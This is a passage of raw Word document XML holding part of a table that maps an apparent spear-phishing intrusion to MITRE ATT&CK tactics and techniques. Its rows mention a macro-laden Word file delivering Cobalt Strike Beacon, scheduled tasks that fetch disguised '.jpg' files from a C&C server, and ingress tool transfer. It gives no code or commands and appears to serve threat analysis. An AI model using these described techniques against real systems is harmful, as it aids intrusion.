            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="613F02CA" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40430658" w14:textId="0D7F21C4" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66572E84" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w14:paraId="0CF336AE" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58D8E6F5" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14213181" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5874D5F0" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15403B3F" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03336231" w14:textId="5F5AF7CF" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CCE6A4A" w14:textId="68B666FD" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C2D984E" w14:textId="5DCC971F" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C38DFEC" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w14:paraId="0E483877" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698571CC" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6B8EFA" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">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541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C58EDEE" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AAC8686" w14:textId="445B44D9" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20FB6588" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73020BA1" w14:textId="3899EB3A" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B18BF5" w14:textId="7449EF21" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21532892" w14:textId="31EDEF18" w:rsidR="000F3EE3" w:rsidRPr="00BB627A" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Two types payloads were found in the spear-phishing emails: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w14:paraId="0A7E34B4" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03AAF564" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5094ADBB" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">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541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72D9C5CF" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27867F1A" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0AF876" w14:textId="77777777" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="020DDB40" w14:textId="03E1D874" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC6C74F" w14:textId="5367A904" w:rsidR="000F3EE3" w:rsidRPr="00B857D7" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD90ABF" w14:textId="5807AF43" w:rsidR="000F3EE3" w:rsidRPr="00FF1E4B" w:rsidRDefault="000F3EE3" w:rsidP="000F3EE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF1E4B">
              <w:t>Word File with malicious macro delivering Cobalt Strike Beacon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w14:paraId="7F98DB6B" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53A5EF81" w14:textId="0A849070" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE201C8" w14:textId="688D66E1" w:rsidR="007B4DCC" w:rsidRPr="00DB171B"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0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C6B07EF" w14:textId="37887F33" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1053.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task, </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711C3117" w14:textId="27F1049D" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00BF3708" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="674BC70E" w14:textId="0A399F74" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61943451" w14:textId="298FE122" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="000F3EE3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA7F619" w14:textId="32AFAC35" w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B" w:rsidRDefault="007B2E5E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r>
              <w:t>The malicious macro creates two scheduled tasks that download files camouflaged as “.jpg” files from the C&amp;C server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w14:paraId="5D83701F" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40634518" w14:textId="1AA5C20D" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B5E8A4E" w14:textId="6D46B23B" w:rsidR="007B4DCC" w:rsidRPr="00DB171B"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0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34ECA1FC" w14:textId="38C082D7" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="750F1D9B" w14:textId="644ABD0C" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB2DB0A" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4127FB50" w14:textId="268A7989" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="000C6969" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FEFB413" w14:textId="4504509A" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="000F3EE3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DC24FB" w14:textId="15462354" w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B" w:rsidRDefault="007B2E5E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w14:paraId="19E5052E" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
